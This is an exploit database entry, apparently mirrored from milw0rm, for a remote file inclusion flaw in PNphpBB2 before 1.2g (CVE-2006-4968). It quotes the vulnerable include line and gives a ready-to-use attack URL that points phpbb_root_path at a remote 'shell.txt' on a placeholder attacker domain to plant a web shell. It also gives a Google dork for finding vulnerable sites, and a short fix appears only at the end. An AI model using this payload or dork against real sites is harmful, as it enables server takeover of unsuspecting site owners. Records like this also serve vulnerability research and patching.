[] NeoSense
E X P L O I T S
title author type platform port cve id

PNPHPBB2 < 1.2g - 'phpbb_root_path' Remote File Inclusion

Author: AzzCoder
type: webapps
platform: php
port: 
date_added: 2006-09-17 
date_updated: 2017-01-12 
verified: 1 
codes: OSVDB-30830;CVE-2006-4968 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comPNphpBB2_12g.tar.gz
Yeah, another ZeroDay Smile

Vendor: http://www.pnphpbb.com/

Vulnerable File: includes/functions_admin.php

Vulnerable Code:

//The phpbb_root_path isn't initialize

include_once( $phpbb_root_path . 'includes/functions.' . $phpEx );

Method To Use:

http://www.victim.com/[pn_phpbb]/includes/functions_admin.php?phpbb_root_path=http://yourdomain.com/shell.txt?

How To Fix:

Add this code before the include
Code:
if ( !defined('IN_PHPBB') )
{
   die("Hacking attempt");
}


Google Dork: Powered by PNphpBB2 / Powered por PNphpBB2

# milw0rm.com [2006-09-18]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.